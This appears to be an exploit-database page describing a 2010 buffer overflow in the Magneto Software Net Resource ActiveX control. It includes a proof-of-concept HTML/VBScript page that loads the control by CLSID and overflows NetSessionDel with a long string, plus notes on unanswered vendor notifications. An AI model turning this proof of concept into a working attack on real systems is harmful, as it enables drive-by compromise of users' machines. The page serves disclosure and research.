header-logo
Suggest Exploit
vendor:
Net Resource ActiveX
by:
s4squatch
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Net Resource ActiveX
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Magneto Software Net Resource ActiveX NetSessionDel BOF

A buffer overflow vulnerability exists in Magneto Software Net Resource ActiveX control (SKNetResource.ocx) when handling the NetSessionDel function. By supplying a large string as the second parameter, an attacker can overwrite the EAX, EBX, and SEH registers, resulting in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Magneto Software Net Resource ActiveX control.
Source

Exploit-DB raw data:

<html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX NetSessionDel BOF
'Discovered by:  s4squatch
'Site:  www.securestate.com
'Date Discovered: 02/11/10
'www:  http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'Download:  http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'Published 04/13/10
'SKNetResource.ocx
'Function NetSessionDel ( ByVal strServerName As String ,  ByVal strClientName As String ,  ByVal nSessionId As Integer ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"

'EAX, EBX, SEH overwritten

buff = String(1024, "A")

target.NetSessionDel "defaultV", buff, 1

</script>